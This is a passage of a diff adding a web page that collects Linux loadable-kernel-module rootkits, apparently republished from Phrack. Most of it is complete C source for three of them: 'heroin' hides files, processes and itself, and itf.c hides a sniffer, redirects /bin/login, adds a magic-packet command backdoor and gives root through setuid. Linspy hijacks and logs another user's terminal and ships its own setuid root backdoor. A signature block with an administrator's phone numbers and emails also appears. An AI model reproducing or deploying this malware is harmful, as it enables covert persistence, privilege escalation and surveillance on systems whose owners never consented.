+ * Once loaded, the module becomes invisible and can not be removed
+ * with rmmod. Any files or directories starting with the string
+ * defined by MAGIC_PREFIX appear to disappear, and sending a signal
+ * 31 to any process as root effectively hides it and all its future
+ * children.
+ *
+ * This code should compile cleanly and work with most (if not all)
+ * recent 2.1.x kernels, and has been tested under 2.1.44 and 2.1.57.
+ * It will not compile as is under 2.0.30, since 2.0.30 lacks the
+ * query_module() function.
+ *
+ * Compile with:
+ *   gcc -O2 -fomit-frame-pointer -DMODULE -D__KERNEL__ -c heroin.c
+ */
+
+#include <linux/fs.h>
+#include <linux/module.h>
+#include <linux/modversions.h>
+#include <linux/malloc.h>
+#include <linux/unistd.h>
+#include <sys/syscall.h>
+
+#include <linux/dirent.h>
+#include <linux/proc_fs.h>
+#include <stdlib.h>
+
+#define MAGIC_PREFIX "heroin"
+
+#define PF_INVISIBLE 0x10000000
+#define SIGINVISI 31
+
+int errno;
+
+static inline _syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
+static inline _syscall2(int, kill, pid_t, pid, int, sig);
+static inline _syscall3(ssize_t, read, int, fd, void *, buf, size_t, count);
+static inline _syscall5(int, query_module, const char *, name, int, which, void *, buf, size_t, bufsize, size_t *, ret);
+
+extern void *sys_call_table[];
+
+int (*original_getdents)(unsigned int, struct dirent *, unsigned int);
+int (*original_kill)(pid_t, int);
+int (*original_read)(int, void *, size_t);
+int (*original_query_module)(const char *, int, void *, size_t, size_t *);
+
+int myatoi(char *str)
+{
+        int res = 0;
+        int mul = 1;
+        char *ptr;
+
+        for(ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
+                if(*ptr < '0' || *ptr > '9')
+                        return(-1);
+                res += (*ptr - '0') * mul;
+                mul *= 10;
+        }
+        return(res);
+}
+
+void mybcopy(char *src, char *dst, unsigned int num)
+{
+        while(num--)
+                *(dst++) = *(src++);
+}
+
+int mystrcmp(char *str1, char *str2)
+{
+        while(*str1 && *str2)
+                if(*(str1++) != *(str2++))
+                        return(-1);
+        return(0);
+}
+
+struct task_struct *find_task(pid_t pid)
+{
+        struct task_struct *task = current;
+
+        do {
+                if(task->pid == pid)
+                        return(task);
+
+                task = task->next_task;
+
+        } while(task != current);
+
+        return(NULL);
+}
+
+int is_invisible(pid_t pid)
+{
+        struct task_struct *task;
+
+        if((task = find_task(pid)) == NULL)
+                return(0);
+
+        if(task->flags & PF_INVISIBLE)
+                return(1);
+
+        return(0);
+}
+
+int hacked_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
+{
+        int res;
+        int proc = 0;
+        struct inode *dinode;
+        char *ptr = (char *)dirp;
+        struct dirent *curr;
+        struct dirent *prev = NULL;
+
+        res = (*original_getdents)(fd, dirp, count);
+
+        if(!res)
+                return(res);
+
+        if(res == -1)
+                return(-errno);
+
+#ifdef __LINUX_DCACHE_H
+        dinode = current->files->fd[fd]->f_dentry->d_inode;
+#else
+        dinode = current->files->fd[fd]->f_inode;
+#endif
+
+        if(dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1)
+                proc = 1;
+
+        while(ptr < (char *)dirp + res) {
+                curr = (struct dirent *)ptr;
+
+                if((!proc && !mystrcmp(MAGIC_PREFIX, curr->d_name)) ||
+                        (proc && is_invisible(myatoi(curr->d_name)))) {
+
+                        if(curr == dirp) {
+                                res -= curr->d_reclen;
+                                mybcopy(ptr + curr->d_reclen, ptr, res);
+                                continue;
+                        }
+                        else
+                                prev->d_reclen += curr->d_reclen;
+                }
+                else
+                        prev = curr;
+
+                ptr += curr->d_reclen;
+        }
+
+        return(res);
+}
+
+int hacked_kill(pid_t pid, int sig)
+{
+        int res;
+        struct task_struct *task = current;
+
+        if(sig != SIGINVISI) {
+                res = (*original_kill)(pid, sig);
+
+                if(res == -1)
+                        return(-errno);
+
+                return(res);
+        }
+
+        if((task = find_task(pid)) == NULL)
+                return(-ESRCH);
+
+        if(current->uid && current->euid)
+                return(-EPERM);
+
+        task->flags |= PF_INVISIBLE;
+
+        return(0);
+}
+
+int hacked_read(int fd, char *buf, size_t count)
+{
+        int res;
+        char *ptr, *match;
+        struct inode *dinode;
+
+        res = (*original_read)(fd, buf, count);
+
+        if(res == -1)
+                return(-errno);
+
+#ifdef __LINUX_DCACHE_H
+        dinode = current->files->fd[fd]->f_dentry->d_inode;
+#else
+        dinode = current->files->fd[fd]->f_inode;
+#endif
+
+        if(dinode->i_ino != PROC_MODULES || MAJOR(dinode->i_dev) || MINOR(dinode->i_dev) != 1)
+                return(res);
+
+        ptr = buf;
+
+        while(ptr < buf + res) {
+                if(!mystrcmp(MAGIC_PREFIX, ptr)) {
+                        match = ptr;
+                        while(*ptr && *ptr != '\n')
+                                ptr++;
+                        ptr++;
+                        mybcopy(ptr, match, (buf + res) - ptr);
+                        res = res - (ptr - match);
+                        return(res);
+                }
+                while(*ptr && *ptr != '\n')
+                        ptr++;
+                ptr++;
+        }
+
+        return(res);
+}
+
+int hacked_query_module(const char *name, int which, void *buf, size_t bufsize, size_t *ret)
+{
+        int res;
+        int cnt;
+        char *ptr, *match;
+
+        res = (*original_query_module)(name, which, buf, bufsize, ret);
+
+        if(res == -1)
+                return(-errno);
+
+        if(which != QM_MODULES)
+                return(res);
+
+        ptr = buf;
+
+        for(cnt = 0; cnt < *ret; cnt++) {
+                if(!mystrcmp(MAGIC_PREFIX, ptr)) {
+                        match = ptr;
+                        while(*ptr)
+                                ptr++;
+                        ptr++;
+                        mybcopy(ptr, match, bufsize - (ptr - (char *)buf));
+                        (*ret)--;
+                        return(res);
+                }
+                while(*ptr)
+                        ptr++;
+                ptr++;
+        }
+
+        return(res);
+}
+
+int init_module(void)
+{
+        original_getdents = sys_call_table[SYS_getdents];
+        sys_call_table[SYS_getdents] = hacked_getdents;
+
+        original_kill = sys_call_table[SYS_kill];
+        sys_call_table[SYS_kill] = hacked_kill;
+
+        original_read = sys_call_table[SYS_read];
+        sys_call_table[SYS_read] = hacked_read;
+
+        original_query_module = sys_call_table[SYS_query_module];
+        sys_call_table[SYS_query_module] = hacked_query_module;
+
+        return(0);
+}
+
+void cleanup_module(void)
+{
+        sys_call_table[SYS_getdents] = original_getdents;
+        sys_call_table[SYS_kill] = original_kill;
+        sys_call_table[SYS_read] = original_read;
+        sys_call_table[SYS_query_module] = original_query_module;
+}
+
+-----
+
+-----
+Runar Jensen            | Phone  (318) 289-0125 | Email zarq@1stnet.com
+Network Administrator   |   or   (800) 264-7440 |   or  zarq@opaque.org
+Tech Operations Mgr     | Fax    (318) 235-1447 | Epage zarq@page.1stnet.com
+FirstNet of Acadiana    | Pager  (318) 268-8533 |       [message in subject]
+
+</xmp>
+
+
+<H3><A NAME="A-c"></A>LKM Hider / Socket Backdoor</h3>
+
+<b>NAME</b>            : itf.c<br>
+<b>AUTHOR</b>          : <A HREF="mailto:dube0866@eurobretagne.fr">plaguez</a><br>
+<b>DESCRIPTION</b>     : This very good LKM was published in phrack 52 (article 18 :
+                  'Weakening the Linux Kernel'). I often refered to it although                   
+                  some ideas in it were also taken from other LKMs / texts which
+                  were published before. This module has everything you need to
+                  backdoor a system in a very effective way. Look at the text
+                  supplied with it for all of its features.<br>
+<b>LINK</b>            : <A HREF="http://www.phrack.com">http://www.phrack.com</a><br>
+
+<xmp>
+Here is itf.c.  The goal of this program is to demonstrate kernel backdooring
+techniques using systemcall redirection.  Once installed, it is very hard to
+spot.
+
+Its features include:
+
+- stealth functions:  once insmod'ed, itf will modify struct module *mp and
+get_kernel_symbols(2) so it won't appear in /proc/modules or ksyms' outputs.
+Also, the module cannot be unloaded.
+
+- sniffer hidder: itf will backdoor ioctl(2) so that the PROMISC flag will be
+hidden.  Note that you'll need to place the sniffer BEFORE insmod'ing itf.o,
+because itf will trap a change in the PROMISC flag and will then stop hidding
+it (otherwise you'd just have to do a ifconfig eth0 +promisc and you'd spot
+the module...).
+
+- file hidder: itf will also patch the getdents(2) system calls, thus hidding
+files containing a certain word in their filename.
+
+- process hidder: using the same technique as described above, itf will hide
+/procs/PÏD directories using argv entries.  Any process named with the magic
+name will be hidden from the procfs tree.
+
+- execve redirection: this implements Halflife's idea discussed in P51.
+If a given program (notably /bin/login) is execve'd, itf will execve
+another program instead.  It uses tricks to overcome Linux memory managment
+limitations: brk(2) is used to increase the calling program's data segment
+size, thus allowing us to allocate user memory while in kernel mode (remember
+that most system calls wait for arguments in user memory, not kernel mem).
+
+- socket recvfrom() backdoor: when a packet matching a given size and a given
+string is received, a non-interactive program will be executed.  Typicall use
+is a shell script (which will be hidden using the magic name) that opens
+another port and waits there for shell commands.
+
+- setuid() trojan: like Halflife's stuff.  When a setuid() syscall with uid ==
+magic number is done, the calling process will get uid = euid = gid = 0
+
+
+<++> lkm_trojan.c
+/*
+ * itf.c v0.8
+ * Linux Integrated Trojan Facility
+ * (c) plaguez 1997  --  dube0866@eurobretagne.fr
+ * This is mostly not fully tested code. Use at your own risks.
+ *
+ * 
+ * compile with:
+ *   gcc -c -O3 -fomit-frame-pointer itf.c
+ * Then:
+ *   insmod itf
+ * 
+ * 
+ * Thanks to Halflife and Solar Designer for their help/ideas. 
+ *
+ * Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial.
+ *
+ * 
+ */
+
+#define MODULE
+#define __KERNEL__
+
+
+#include <linux/config.h>
+#include <linux/module.h>
+#include <linux/version.h>
+
+#include <linux/types.h>
+#include <linux/fs.h>
+#include <linux/mm.h>
+#include <linux/errno.h>
+#include <asm/segment.h>
+#include <asm/pgtable.h>
+#include <sys/syscall.h>
+#include <linux/dirent.h>
+#include <asm/unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/socketcall.h>
+#include <linux/netdevice.h>
+#include <linux/if.h>
+#include <linux/if_arp.h>
+#include <linux/if_ether.h>
+#include <linux/proc_fs.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <ctype.h>
+
+
+/* Customization section 
+ * - RECVEXEC is the full pathname of the program to be launched when a packet
+ * of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom().
+ * This program can be a shell script, but must be able to handle null **argv (I'm too lazy
+ * to write more than execve(RECVEXEC,NULL,NULL); :)
+ * - NEWEXEC is the name of the program that is executed instead of OLDEXEC
+ * when an execve() syscall occurs.
+ * - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID)
+ * is made (like Halflife's code)
+ * - files containing MAGICNAME in their full pathname will be invisible to
+ * a getdents() system call.
+ * - processes containing MAGICNAME in their process name will be hidden of the
+ * procfs tree.
+ */
+#define MAGICNAME "w00w00T$!"
+#define MAGICUID  31337
+#define OLDEXEC   "/bin/login"
+#define NEWEXEC   "/.w00w00T$!/w00w00T$!login"
+#define RECVEXEC  "/.w00w00T$!/w00w00T$!recv"
+#define MAGICSIZE sizeof(MAGICNAME)+10
+
+/* old system calls vectors */
+int (*o_getdents) (uint, struct dirent *, uint);
+ssize_t(*o_readdir) (int, void *, size_t);
+int (*o_setuid) (uid_t);
+int (*o_execve) (const char *, const char *[], const char *[]);
+int (*o_ioctl) (int, int, unsigned long);
+int (*o_get_kernel_syms) (struct kernel_sym *);
+ssize_t(*o_read) (int, void *, size_t);
+int (*o_socketcall) (int, unsigned long *);
+/* entry points to brk() and fork() syscall. */
+static inline _syscall1(int, brk, void *, end_data_segment);
+static inline _syscall0(int, fork);
+static inline _syscall1(void, exit, int, status);
+
+extern void *sys_call_table[];
+extern struct proto tcp_prot;
+int errno;
+
+char mtroj[] = MAGICNAME;
+int __NR_myexecve;
+int promisc;
+
+
+
+/*
+ * String-oriented functions
+ * (from user-space to kernel-space or invert)
+ */
+
+char *strncpy_fromfs(char *dest, const char *src, int n)
+{
+    char *tmp = src;
+    int compt = 0;
+
+    do {
+	dest[compt++] = __get_user(tmp++, 1);
+    }
+    while ((dest[compt - 1] != '\0') && (compt != n));
+
+    return dest;
+}
+
+
+int myatoi(char *str)
+{
+    int res = 0;
+    int mul = 1;
+    char *ptr;
+
+    for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
+	if (*ptr < '0' || *ptr > '9')
+	    return (-1);
+	res += (*ptr - '0') * mul;
+	mul *= 10;
+    }
+    return (res);
+}
+
+
+
+/*
+ * process hiding functions
+ */
+struct task_struct *get_task(pid_t pid)
+{
+    struct task_struct *p = current;
+    do {
+	if (p->pid == pid)
+	    return p;
+	p = p->next_task;
+    }
+    while (p != current);
+    return NULL;
+
+}
+
+/* the following function comes from fs/proc/array.c */
+static inline char *task_name(struct task_struct *p, char *buf)
+{
+    int i;
+    char *name;
+
+    name = p->comm;
+    i = sizeof(p->comm);
+    do {
+	unsigned char c = *name;
+	name++;
+	i--;
+	*buf = c;
+	if (!c)
+	    break;
+	if (c == '\\') {
+	    buf[1] = c;
+	    buf += 2;
+	    continue;
+	}
+	if (c == '\n') {
+	    buf[0] = '\\';
+	    buf[1] = 'n';
+	    buf += 2;
+	    continue;
+	}
+	buf++;
+    }
+    while (i);
+    *buf = '\n';
+    return buf + 1;
+}
+
+
+
+int invisible(pid_t pid)
+{
+    struct task_struct *task = get_task(pid);
+    char *buffer;
+    if (task) {
+	buffer = kmalloc(200, GFP_KERNEL);
+	memset(buffer, 0, 200);
+	task_name(task, buffer);
+	if (strstr(buffer, (char *) &mtroj)) {
+	    kfree(buffer);
+	    return 1;
+	}
+    }
+    return 0;
+}
+
+
+
+/*
+ * New system calls
+ */
+
+/*
+ * hide module symbols
+ */
+int n_get_kernel_syms(struct kernel_sym *table)
+{
+    struct kernel_sym *tb;
+    int compt, compt2, compt3, i, done;
+
+    compt = (*o_get_kernel_syms) (table);
+    if (table != NULL) {
+	tb = kmalloc(compt * sizeof(struct kernel_sym), GFP_KERNEL);
+	if (tb == 0) {
+	    return compt;
+	}
+	compt2 = 0;
+	done = 0;
+	i = 0;
+	memcpy_fromfs((void *) tb, (void *) table, compt * sizeof(struct kernel_sym));
+	while (!done) {
+	    if ((tb[compt2].name)[0] == '#')
+		i = compt2;
+	    if (!strcmp(tb[compt2].name, mtroj)) {
+		for (compt3 = i + 1; (tb[compt3].name)[0] != '#' && compt3 < compt; compt3++);
+		if (compt3 != (compt - 1))
+		    memmove((void *) &(tb[i]), (void *) &(tb[compt3]), (compt - compt3) * sizeof(struct kernel_sym));
+		else
+		    compt = i;
+		done++;
+	    }
+	    compt2++;
+	    if (compt2 == compt)
+		done++;
+
+	}
+
+	memcpy_tofs(table, tb, compt * sizeof(struct kernel_sym));
+	kfree(tb);
+    }
+    return compt;
+
+}
+
+
+
+/*
+ * how it works:
+ * I need to allocate user memory. To do that, I'll do exactly as malloc() does
+ * it (changing the break value).
+ */
+int my_execve(const char *filename, const char *argv[], const char *envp[])
+{
+    long __res;
+    __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) (filename)), "c"((long) (argv)), "d"((long) (envp)));
+    return (int) __res;
+}
+
+int n_execve(const char *filename, const char *argv[], const char *envp[])
+{
+    char *test;
+    int ret, tmp;
+    char *truc = OLDEXEC;
+    char *nouveau = NEWEXEC;
+    unsigned long mmm;
+
+    test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL);
+    (void) strncpy_fromfs(test, filename, strlen(truc));
+    test[strlen(truc)] = '\0';
+    if (!strcmp(test, truc)) {
+	kfree(test);
+	mmm = current->mm->brk;
+	ret = brk((void *) (mmm + 256));
+	if (ret < 0)
+	    return ret;
+	memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1);
+	ret = my_execve((char *) (mmm + 2), argv, envp);
+	tmp = brk((void *) mmm);
+    } else {
+	kfree(test);
+	ret = my_execve(filename, argv, envp);
+    }
+    return ret;
+
+}
+
+
+/*
+ * Trap the ioctl() system call to hide PROMISC flag on ethernet interfaces.
+ * If we reset the PROMISC flag when the trojan is already running, then it
+ * won't hide it anymore (needed otherwise you'd just have to do an
+ * "ifconfig eth0 +promisc" to find the trojan).
+ */
+int n_ioctl(int d, int request, unsigned long arg)
+{
+    int tmp;
+    struct ifreq ifr;
+
+    tmp = (*o_ioctl) (d, request, arg);
+    if (request == SIOCGIFFLAGS && !promisc) {
+	memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
+	ifr.ifr_flags = ifr.ifr_flags & (~IFF_PROMISC);
+	memcpy_tofs((struct ifreq *) arg, (struct ifreq *) &ifr, sizeof(struct ifreq));
+    } else if (request == SIOCSIFFLAGS) {
+	memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
+	if (ifr.ifr_flags & IFF_PROMISC)
+	    promisc = 1;
+	else if (!(ifr.ifr_flags & IFF_PROMISC))
+	    promisc = 0;
+    }
+    return tmp;
+
+}
+
+
+/*
+ * trojan setMAGICUID() system call.
+ */
+int n_setuid(uid_t uid)
+{
+    int tmp;
+
+    if (uid == MAGICUID) {
+	current->uid = 0;
+	current->euid = 0;
+	current->gid = 0;
+	current->egid = 0;
+	return 0;
+    }
+    tmp = (*o_setuid) (uid);
+    return tmp;
+}
+
+
+/*
+ * trojan getdents() system call. 
+ */
+int n_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
+{
+    unsigned int tmp, n;
+    int t, proc = 0;
+    struct inode *dinode;
+    struct dirent *dirp2, *dirp3;
+
+    tmp = (*o_getdents) (fd, dirp, count);
+
+#ifdef __LINUX_DCACHE_H
+    dinode = current->files->fd[fd]->f_dentry->d_inode;
+#else
+    dinode = current->files->fd[fd]->f_inode;
+#endif
+
+    if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1)
+	proc = 1;
+    if (tmp > 0) {
+	dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
+	memcpy_fromfs(dirp2, dirp, tmp);
+	dirp3 = dirp2;
+	t = tmp;
+	while (t > 0) {
+	    n = dirp3->d_reclen;
+	    t -= n;
+	    if ((strstr((char *) &(dirp3->d_name), (char *) &mtroj) != NULL) \
+		||(proc && invisible(myatoi(dirp3->d_name)))) {
+		if (t != 0)
+		    memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
+		else
+		    dirp3->d_off = 1024;
+		tmp -= n;
+	    }
+	    if (dirp3->d_reclen == 0) {
+		/*
+		 * workaround for some shitty fs drivers that do not properly
+		 * feature the getdents syscall.
+		 */
+		tmp -= t;
+		t = 0;
+	    }
+	    if (t != 0)
+		dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
+
+
+	}
+	memcpy_tofs(dirp, dirp2, tmp);
+	kfree(dirp2);
+    }
+    return tmp;
+
+}
+
+
+/*
+ * Trojan socketcall system call
+ * executes a given binary when a packet containing the magic word is received.
+ * WARNING: THIS IS REALLY UNTESTED UGLY CODE. MAY CORRUPT YOUR SYSTEM.  
+ */
+
+int n_socketcall(int call, unsigned long *args)
+{
+    int ret, ret2, compt;
+    char *t = RECVEXEC;
+    unsigned long *sargs = args;
+    unsigned long a0, a1, mmm;
+    void *buf;
+
+    ret = (*o_socketcall) (call, args);
+    if (ret == MAGICSIZE && call == SYS_RECVFROM) {
+	a0 = get_user(sargs);
+	a1 = get_user(sargs + 1);
+	buf = kmalloc(ret, GFP_KERNEL);
+	memcpy_fromfs(buf, (void *) a1, ret);
+	for (compt = 0; compt < ret; compt++)
+	    if (((char *) (buf))[compt] == 0)
+		((char *) (buf))[compt] = 1;
+	if (strstr(buf, mtroj)) {
+	    kfree(buf);
+	    ret2 = fork();
+	    if (ret2 == 0) {
+		mmm = current->mm->brk;
+		ret2 = brk((void *) (mmm + 256));
+		memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1);
+/* Hope the execve has been successfull otherwise you'll have 2 copies of the
+   master process in the ps list :] */
+		ret2 = my_execve((char *) mmm + 2, NULL, NULL);
+	    }
+	}
+    }
+    return ret;
+}
+
+
+
+
+
+/*
+ * module initialization stuff.
+ */
+int init_module(void)
+{
+/* module list cleaning */
+/* would need to make a clean search of the right register
+ * in the function prologue, since gcc may not always put 
+ * struct module *mp in %ebx 
+ * 
+ * Try %ebx, %edi, %ebp, well, every register actually :)
+ */
+    register struct module *mp asm("%ebx");
+    *(char *) (mp->name) = 0;
+    mp->size = 0;
+    mp->ref = 0;
+/*
+ * Make it unremovable
+ */
+/*    MOD_INC_USE_COUNT;
+ */
+    o_get_kernel_syms = sys_call_table[SYS_get_kernel_syms];
+    sys_call_table[SYS_get_kernel_syms] = (void *) n_get_kernel_syms;
+
+    o_getdents = sys_call_table[SYS_getdents];
+    sys_call_table[SYS_getdents] = (void *) n_getdents;
+
+    o_setuid = sys_call_table[SYS_setuid];
+    sys_call_table[SYS_setuid] = (void *) n_setuid;
+
+    __NR_myexecve = 164;
+    while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
+	__NR_myexecve--;
+    o_execve = sys_call_table[SYS_execve];
+    if (__NR_myexecve != 0) {
+	sys_call_table[__NR_myexecve] = o_execve;
+	sys_call_table[SYS_execve] = (void *) n_execve;
+    }
+    promisc = 0;
+    o_ioctl = sys_call_table[SYS_ioctl];
+    sys_call_table[SYS_ioctl] = (void *) n_ioctl;
+
+    o_socketcall = sys_call_table[SYS_socketcall];
+    sys_call_table[SYS_socketcall] = (void *) n_socketcall;
+    return 0;
+
+}
+
+
+void cleanup_module(void)
+{
+    sys_call_table[SYS_get_kernel_syms] = o_get_kernel_syms;
+    sys_call_table[SYS_getdents] = o_getdents;
+    sys_call_table[SYS_setuid] = o_setuid;
+    sys_call_table[SYS_socketcall] = o_socketcall;
+
+    if (__NR_myexecve != 0)
+	sys_call_table[__NR_myexecve] = 0;
+    sys_call_table[SYS_execve] = o_execve;
+
+    sys_call_table[SYS_ioctl] = o_ioctl;
+}
+<-->
+
+----[  EOF
+</xmp>
+
+<H3><A NAME="A-d"></A>LKM TTY hijacking</h3>
+
+<b>NAME</b>            : linspy<br>
+<b>AUTHOR</b>          : <A HREF="mailto:halflife@infonexus.com">halflife</a><br>
+<b>DESCRIPTION</b>     : This LKM comes again Phrack issue 50 (article 5: 'Abuse of the
+                  Linux Kernel for Fun and Profit'). It is a very nice TTY 
+                  hijacker working the way I outline in II.7. This module
+                  uses its own character device for control / and logging.<br>
+<b>LINK</b>            : <A HREF="http://www.phrack.com">http://www.phrack.com</a><br>
+
+
+<xmp>
+<++> linspy/Makefile
+CONFIG_KERNELD=-DCONFIG_KERNELD
+CFLAGS = -m486 -O6 -pipe -fomit-frame-pointer -Wall $(CONFIG_KERNELD)
+CC=gcc
+# this is the name of the device you have (or will) made with mknod
+DN = '-DDEVICE_NAME="/dev/ltap"'
+# 1.2.x need this to compile, comment out on 1.3+ kernels
+V = #-DNEED_VERSION
+MODCFLAGS := $(V) $(CFLAGS) -DMODULE -D__KERNEL__ -DLINUX
+
+all:		linspy ltread setuid
+
+linspy:		linspy.c /usr/include/linux/version.h
+		$(CC) $(MODCFLAGS) -c linspy.c
+
+ltread:		
+		$(CC) $(DN) -o ltread ltread.c
+
+clean:		
+		rm *.o ltread
+
+setuid:		hacked_setuid.c /usr/include/linux/version.h
+		$(CC) $(MODCFLAGS) -c hacked_setuid.c
+                                                     
+<--> end Makefile
+<++> linspy/hacked_setuid.c
+int errno;
+#include <linux/sched.h>
+#include <linux/mm.h>
+#include <linux/malloc.h>
+#include <linux/errno.h>
+#include <linux/sched.h>
+#include <linux/kernel.h>
+#include <linux/times.h>
+#include <linux/utsname.h>
+#include <linux/param.h>
+#include <linux/resource.h>
+#include <linux/signal.h>
+#include <linux/string.h>
+#include <linux/ptrace.h>
+#include <linux/stat.h>
+#include <linux/mman.h>
+#include <linux/mm.h>
+#include <asm/segment.h>
+#include <asm/io.h>
+#include <linux/module.h>
+#include <linux/version.h>
+#include <errno.h>
+#include <linux/unistd.h>
+#include <string.h>
+#include <asm/string.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/sysmacros.h>
+#ifdef NEED_VERSION
+static char kernel_version[] = UTS_RELEASE;
+#endif
+static inline _syscall1(int, setuid, uid_t, uid);
+extern void *sys_call_table[];
+void *original_setuid;
+extern int hacked_setuid(uid_t uid)
+{
+   int i;                     
+   if(uid == 4755)
+   {
+      current->uid = current->euid = current->gid = current->egid = 0;
+      return 0;
+   }
+   sys_call_table[SYS_setuid] = original_setuid;
+   i = setuid(uid);
+   sys_call_table[SYS_setuid] = hacked_setuid;
+   if(i == -1) return -errno;
+   else return i;
+}
+int init_module(void)
+{
+   original_setuid = sys_call_table[SYS_setuid];
+   sys_call_table[SYS_setuid] = hacked_setuid;
+   return 0;
+}
+void cleanup_module(void)
+{
+   sys_call_table[SYS_setuid] = original_setuid;
+}  
+<++> linspy/linspy.c
+int errno;
+#include <linux/tty.h>
+#include <linux/sched.h>
+#include <linux/mm.h>
+#include <linux/malloc.h>
+#include <linux/errno.h>
+#include <linux/sched.h>
+#include <linux/kernel.h>
+#include <linux/times.h>
+#include <linux/utsname.h>
+#include <linux/param.h>
+#include <linux/resource.h>
+#include <linux/signal.h>
+#include <linux/string.h>
+#include <linux/ptrace.h>
+#include <linux/stat.h>
+#include <linux/mman.h>
+#include <linux/mm.h>
+#include <asm/segment.h>
+#include <asm/io.h>
+#ifdef MODULE
+#include <linux/module.h>       
+#include <linux/version.h>
+#endif
+#include <errno.h>
+#include <asm/segment.h>
+#include <linux/unistd.h>
+#include <string.h>
+#include <asm/string.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/sysmacros.h>
+#include <linux/vt.h>
+
+/* set the version information, if needed */
+#ifdef NEED_VERSION
+static char kernel_version[] = UTS_RELEASE;
+#endif
+
+#ifndef MIN
+#define MIN(a,b)        ((a) < (b) ? (a) : (b))
+#endif
+
+/* ring buffer info */        
+
+#define BUFFERSZ        2048
+char buffer[BUFFERSZ];
+int queue_head = 0;
+int queue_tail = 0;
+
+/* taken_over indicates if the victim can see any output */
+int taken_over = 0;
+
+static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);
+extern void *sys_call_table[];
+
+/* device info for the linspy device, and the device we are watching */
+static int linspy_major = 40;
+int tty_minor = -1;
+int tty_major = 4;
+
+/* address of original write(2) syscall */
+void *original_write;
+
+void save_write(char *, size_t);
+
+
+int out_queue(void) 
+{
+   int c;
+   if(queue_head == queue_tail) return -1;
+   c = buffer[queue_head];
+   queue_head++;
+   if(queue_head == BUFFERSZ) queue_head=0;
+   return c;
+}
+
+int in_queue(int ch)
+{
+   if((queue_tail + 1) == queue_head) return 0;
+   buffer[queue_tail] = ch;
+   queue_tail++;
+   if(queue_tail == BUFFERSZ) queue_tail=0;
+   return 1;
+}
+
+
+/* check if it is the tty we are looking for */
+int is_fd_tty(int fd)
+{
+   struct file *f=NULL;
+   struct inode *inode=NULL;
+   int mymajor=0;
+   int myminor=0;
+
+   if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode))
+      return 0;
+   mymajor = major(inode->i_rdev);
+   myminor = minor(inode->i_rdev);
+   if(mymajor != tty_major) return 0;
+   if(myminor != tty_minor) return 0;
+   return 1;
+}
+
+/* this is the new write(2) replacement call */
+extern int new_write(int fd, char *buf, size_t count)
+{
+   int r;
+   if(is_fd_tty(fd))
+   {
+      if(count > 0)
+         save_write(buf, count);
+      if(taken_over) return count;
+   }
+   sys_call_table[SYS_write] = original_write;
+   r = write(fd, buf, count); 
+   sys_call_table[SYS_write] = new_write;
+   if(r == -1) return -errno;
+   else return r;
+}
+
+
+/* save data from the write(2) call into the buffer */
+void save_write(char *buf, size_t count)
+{
+   int i;
+   for(i=0;i < count;i++)
+      in_queue(get_fs_byte(buf+i));
+}
+
+/* read from the ltap device - return data from queue */
+static int linspy_read(struct inode *in, struct file *fi, char *buf, int count)
+{
+   int i;
+   int c;
+   int cnt=0;
+   if(current->euid != 0) return 0;
+   for(i=0;i < count;i++)
+   {
+      c = out_queue();
+      if(c < 0) break;
+      cnt++;
+      put_fs_byte(c, buf+i);
+   }
+   return cnt;
+}
+
+/* open the ltap device */
+static int linspy_open(struct inode *in, struct file *fi)
+{
+   if(current->euid != 0) return -EIO;
+   MOD_INC_USE_COUNT;
+   return 0;
+}
+
+/* close the ltap device */
+static void linspy_close(struct inode *in, struct file *fi)
+{
+   taken_over=0;
+   tty_minor = -1;
+   MOD_DEC_USE_COUNT;
+}
+             
+/* some ioctl operations */
+static int
+linspy_ioctl(struct inode *in, struct file *fi, unsigned int cmd, unsigned long args)
+{
+#define LS_SETMAJOR     0
+#define LS_SETMINOR     1
+#define LS_FLUSHBUF     2
+#define LS_TOGGLE       3
+
+   if(current->euid != 0) return -EIO;
+   switch(cmd)
+   {
+      case LS_SETMAJOR:
+         tty_major = args;
+         queue_head = 0;
+         queue_tail = 0;
+         break;
+      case LS_SETMINOR:
+         tty_minor = args;
+         queue_head = 0;
+         queue_tail = 0;
+         break;
+     case LS_FLUSHBUF:
+         queue_head=0;
+         queue_tail=0;
+         break;
+     case LS_TOGGLE:
+         if(taken_over) taken_over=0;
+         else taken_over=1;
+         break;
+      default:
+         return 1;
+   }
+   return 0;
+}
+
+
+static struct file_operations linspy = {
+NULL,
+linspy_read,
+NULL,
+NULL,
+NULL,
+linspy_ioctl,
+NULL, 
+linspy_open,
+linspy_close,
+NULL
+};
+
+
+/* init the loadable module */
+int init_module(void)
+{
+   original_write = sys_call_table[SYS_write];
+   sys_call_table[SYS_write] = new_write;
+   if(register_chrdev(linspy_major, "linspy", &linspy)) return -EIO;
+   return 0;
+}
+
+/* cleanup module before being removed */
+void cleanup_module(void)
+{
+   sys_call_table[SYS_write] = original_write;
+   unregister_chrdev(linspy_major, "linspy");
+}
+<--> end linspy.c
+<++> linspy/ltread.c
